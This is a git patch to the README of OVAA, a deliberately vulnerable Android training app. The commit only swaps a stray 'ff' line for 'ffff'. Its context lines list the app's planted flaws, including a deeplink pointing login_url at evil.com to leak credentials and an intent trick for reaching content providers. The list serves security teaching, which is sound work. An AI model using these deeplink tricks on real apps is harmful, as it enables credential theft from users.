From 1208004543849b9496f94ef14f6aeecdcce7e2d6 Mon Sep 17 00:00:00 2001
From: christosservos <132352106+christosservos@users.noreply.github.com>
Date: Wed, 3 Apr 2024 16:12:07 +0300
Subject: [PATCH] Update README.md

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 1c4ce93..06cf44c 100644
--- a/README.md
+++ b/README.md
@@ -3,7 +3,7 @@ OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all
 rr
 ## List of vulnerabilities
 This section only includes the list of vulnerabilities, without a detailed description or proof of concept. Examples from OVAA will receive detailed examination and analysis on [our blog](https://blog.oversecured.com/).
-ff
+ffff
 1. Installation of an arbitrary `login_url` via deeplink `oversecured://ovaa/login?url=http://evil.com/`. Leads to the user's user name and password being leaked when they log in.
 2. Obtaining access to arbitrary content providers (not exported, but with the attribute `android:grantUriPermissions="true"`) via deeplink `oversecured://ovaa/grant_uri_permissions`. The attacker's app needs to process `oversecured.ovaa.action.GRANT_PERMISSIONS` and pass intent to `setResult(code, intent)` with flags such as `Intent.FLAG_GRANT_READ_URI_PERMISSION` and the URI of the content provider.
 3. Vulnerable host validation when processing deeplink `oversecured://ovaa/webview?url=...`.